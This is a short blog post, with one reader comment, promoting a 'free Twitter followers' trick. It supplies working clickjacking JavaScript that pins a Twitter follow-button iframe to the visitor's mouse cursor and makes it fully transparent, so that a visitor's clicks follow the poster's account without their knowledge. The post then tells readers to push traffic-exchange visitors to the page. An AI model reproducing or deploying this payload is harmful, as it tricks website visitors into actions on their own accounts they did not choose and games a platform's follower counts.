Get thousands of twitter followers FREE!!


Okay make a new website or blog or whatever,
Now use this nifty script,

Make your visitor autofollows your twitter now 

Code:
<iframe class="twitter-follow-button" allowtransparency="true" frameborder="0" scrolling="no"
  src="http://platform.twitter.com/widgets/follow_button.html?screen_name=your_username"
  style="width:75px; height:20px;">
</iframe>

<script>
if (!document.getElementsByClassName){
    document.getElementsByClassName = function(classname){
        for (i=0; i<document.getElementsByTagName("*").length; i++)
        {  
            if (document.getElementsByTagName("*").item(i).className == classname){
                return new Array(document.getElementsByTagName("*").item(i));
            }
        }
    }
}

var twitterFollowIframe = document.getElementsByClassName('twitter-follow-button')[0];
twitterFollowIframe.style.position = 'absolute';
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)';
//twitterFollowIframe.style.width = '110px';

/*
// cross domain restriction won't allow this
twitterFollowIframe.onload = function() {
    twitterFollowIframe.contentWindow.scrollTo(20, 0);
}
*/

document.onmousemove = function(e){
    if ( !e ) e = window.event;
    twitterFollowIframe.style.left = e.clientX - 20;
    twitterFollowIframe.style.top = e.clientY - 10;
}
</script>

Add the script after <body> tag in your pages
If you wanna make this transparent then change this one:
Code:

before :
twitterFollowIframe.style.opacity = '0.2';
twitterFollowIframe.style.filter = 'alpha(opacity=20)';

after :
twitterFollowIframe.style.opacity = '0';
twitterFollowIframe.style.filter = 'alpha(opacity=0)';

As his thread says, when someone visits, it autofollows your account! Now go to a traffic exchange like hitleap.com or Empireviews And submit your site!!!! Now everyone autosurfing who views your site will automaticly follow you!!!!!!!!

1 Response to Get thousands of twitter followers FREE!!

  1. paid says:

    is the legal activity on twitter if you make maximum people on the twitter and at the end twitter management find out your way of attracting the people and consider this is illegal then what ??????????

Post a Comment